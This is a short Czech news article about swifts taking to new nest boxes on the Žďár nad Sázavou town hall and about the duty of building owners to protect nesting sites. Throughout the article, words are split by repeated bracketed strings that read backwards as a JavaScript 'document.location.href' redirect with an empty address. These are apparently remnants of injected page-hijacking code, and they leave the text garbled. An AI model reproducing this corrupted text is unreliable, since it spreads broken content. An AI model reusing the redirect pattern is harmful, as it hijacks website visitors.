budky, rorýs
Rainbow page separator

Rorýsům na úřadě nové budky vyhovovaly

Středa, 29. října 2014

Budky

Žďár nad Sázavou / Tři ze čtyř speciálních hnízdních budek, které byly le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos vyvěšeny na fasádu městského úřadu pro chráněné rorýse obecné, se setkaly se zájmem svých nových obyvatel. Městský úřad chtěl tím[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to počinem jít příkladem dalším majitelům nemovi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostí, co se týče hledání nového ú[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];točiště pro opeřence patřící do kategorie ohrožených ptačích druhů.
Většina populace rorýsů hnízdí na domech, ale jak jsou objekty zateplovány, ptáci přicházejí o svá původní hnízdiště. Pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože rorýsi jsou na svá hnízdní místa silně fixováni, dlouho jim trvá, než najdou mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nové, přičemž někdy už nezahnízdí vůbec.
Majitelé nemovi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostí, kteří počítají s jejich stavebními úpravami, by pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to měli sledovat, zda v místě rorýsi, kteří stejně jako vlaš[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovky odlétají na zimu do Afriky, hnízdí. Pokud ano, v souladu se zákonnou povinností by neměli rušivě zasahovat do vývoje chráněného živočišného druhu. Mohou ale jejich hnízda nahradit vhodnými budkami, které splynou s novou fasádou, neznečistí ji a nepoškodí.